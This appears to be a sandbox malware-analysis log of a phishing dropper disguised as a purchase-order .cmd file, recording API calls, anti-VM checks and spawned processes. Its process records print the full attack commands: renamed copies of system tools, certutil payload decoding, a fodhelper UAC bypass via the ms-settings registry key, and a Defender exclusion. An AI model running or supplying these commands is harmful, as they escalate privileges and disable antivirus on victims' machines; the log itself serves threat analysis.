Source: C:\Users\Public\alpha.exe API coverage: 8.1 %
Source: C:\Users\Public\kn.exe API coverage: 0.8 %
Source: C:\Users\Public\Libraries\sppsvc.pif API coverage: 10.0 %
Source: C:\Users\Public\alpha.exe API coverage: 9.6 %
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF API coverage: 6.5 %
Source: C:\Users\Public\xkn.exe TID: 5036 Thread sleep count: 3177 > 30
Source: C:\Users\Public\xkn.exe TID: 5036 Thread sleep count: 1694 > 30
Source: C:\Users\Public\xkn.exe TID: 7960 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\Public\xkn.exe TID: 5704 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Libraries\sppsvc.pif TID: 8048 Thread sleep time: -58500s >= -30000s
Source: C:\Users\Public\Libraries\sppsvc.pif TID: 4780 Thread sleep time: -1140000s >= -30000s
Source: C:\Users\Public\Libraries\sppsvc.pif TID: 4780 Thread sleep time: -27987000s >= -30000s
Source: C:\Users\Public\alpha.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Source: C:\Users\Public\alpha.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 4_2_00007FF789BD823C
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 4_2_00007FF789BD2978
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 4_2_00007FF789BC35B8
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 4_2_00007FF789BC1560
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose, 4_2_00007FF789BE7B4C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 6_2_00007FF789BD823C
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 6_2_00007FF789BD2978
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 6_2_00007FF789BC35B8
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 6_2_00007FF789BC1560
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose, 6_2_00007FF789BE7B4C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose, 25_2_00007FF67DEB5E58
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF119F8 #359,FindFirstFileW,FindNextFileW,FindClose, 25_2_00007FF67DF119F8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose, 25_2_00007FF67DEBDBC0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF11B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359, 25_2_00007FF67DF11B04
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359, 25_2_00007FF67DEF3674
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle, 25_2_00007FF67DEBD4A4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE7D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree, 25_2_00007FF67DE7D440
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357, 25_2_00007FF67DEBB3D8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF16F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357, 25_2_00007FF67DF16F80
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF110C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357, 25_2_00007FF67DF110C4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF13100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357, 25_2_00007FF67DF13100
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEAC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree, 25_2_00007FF67DEAC6F8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF1234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose, 25_2_00007FF67DF1234C
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9FBB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 28_2_1B9FBB30
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9FC34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 28_2_1B9FC34D
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA0C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 28_2_1BA0C291
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA09AF5 FindFirstFileW, 28_2_1BA09AF5
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9F880C FindFirstFileW,FindNextFileW,FindClose, 28_2_1B9F880C
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9F783C FindFirstFileW,FindNextFileW, 28_2_1B9F783C
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9F9665 FindFirstFileW,FindNextFileW,FindClose,FindClose, 28_2_1B9F9665
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9FBD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 28_2_1B9FBD37
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA3E879 FindFirstFileExA, 28_2_1BA3E879
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 29_2_00007FF789BD823C
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 29_2_00007FF789BD2978
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 29_2_00007FF789BC35B8
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BC1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 29_2_00007FF789BC1560
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BE7B4C FindFirstFileW,FindNextFileW,FindClose, 29_2_00007FF789BE7B4C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_029A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 36_2_029A5878
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2106C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 36_2_2106C34D
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21069253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 36_2_21069253
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2107C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 36_2_2107C291
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21069665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 36_2_21069665
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2106880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 36_2_2106880C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2106783C FindFirstFileW,FindNextFileW, 36_2_2106783C
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_210AE879 FindFirstFileExA, 36_2_210AE879
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2106BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 36_2_2106BB30
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21079AF5 FindFirstFileW,FindNextFileW,FindNextFileW, 36_2_21079AF5
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2106BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 36_2_2106BD37
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21067C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 36_2_21067C97
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree, 25_2_00007FF67DEF511C
Source: C:\Users\Public\xkn.exe Thread delayed: delay time: 922337203685477
Source: Kpeyvroh.PIF, 00000026.00000002.2504569132.0000000000652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: Kpeyvroh.PIF, 00000024.00000002.2419249499.000000000071E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
Source: xkn.exe, 00000009.00000002.2186803766.0000015A4B040000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: sppsvc.pif, 0000001C.00000003.3094405950.0000000000796000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094405950.0000000000781000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: xkn.exe, 00000009.00000002.2186803766.0000015A4B040000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R
Source: C:\Users\Public\Libraries\sppsvc.pif API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF API call chain: ExitProcess graph end node
Source: C:\Users\Public\xkn.exe Process information queried: ProcessInformation
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BE63FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW, 4_2_00007FF789BE63FC
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF65588A29C memset,SearchPathW,CreateFileW,GetFileSize,ReadFile,SetFilePointer,CharNextW,IsCharAlphaNumericW,StrToIntW,IsCharAlphaNumericW,StrToIntW,CharNextW,GetLastError,OutputDebugStringW,CloseHandle, 14_2_00007FF65588A29C
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9F6A63 LoadLibraryA,GetProcAddress, 28_2_1B9F6A63
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA332B5 mov eax, dword ptr fs:[00000030h] 28_2_1BA332B5
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_210A32B5 mov eax, dword ptr fs:[00000030h] 36_2_210A32B5
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_029E53AD mov eax, dword ptr fs:[00000030h] 36_2_029E53AD
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, 4_2_00007FF789BD823C
Source: C:\Users\Public\xkn.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00007FF789BD8FA4
Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BD93B0 SetUnhandledExceptionFilter, 4_2_00007FF789BD93B0
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00007FF789BD8FA4
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF789BD93B0 SetUnhandledExceptionFilter, 6_2_00007FF789BD93B0
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF65588ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_00007FF65588ED50
Source: C:\Users\Public\ger.exe Code function: 14_2_00007FF65588F050 SetUnhandledExceptionFilter, 14_2_00007FF65588F050
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF453E0 SetUnhandledExceptionFilter, 25_2_00007FF67DF453E0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF44E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 25_2_00007FF67DF44E18
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA2BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_1BA2BB22
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA24B47 SetUnhandledExceptionFilter, 28_2_1BA24B47
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA249F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_1BA249F8
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA249F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_1BA249F9
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA24FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_1BA24FDC
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 29_2_00007FF789BD8FA4
Source: C:\Users\Public\alpha.exe Code function: 29_2_00007FF789BD93B0 SetUnhandledExceptionFilter, 29_2_00007FF789BD93B0
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_210949F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_210949F9
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2109BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_2109BB22
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21094B47 SetUnhandledExceptionFilter, 36_2_21094B47
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21094FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 36_2_21094FDC
Source: C:\Users\Public\xkn.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Users\Public\xkn.exe Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Users\Public\xkn.exe Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 36_2_210720F7
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF7024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356, 25_2_00007FF67DEF7024
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA09627 mouse_event, 28_2_1BA09627
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\Libraries\sppsvc.pif C:\Users\Public\Libraries\sppsvc.pif
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
Source: C:\Users\Public\xkn.exe Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Users\Public\xkn.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe "
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn.exe -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn.exe -windowstyle hidden -command "add-mppreference -exclusionpath c:\users "' ; start fodhelper.exe "
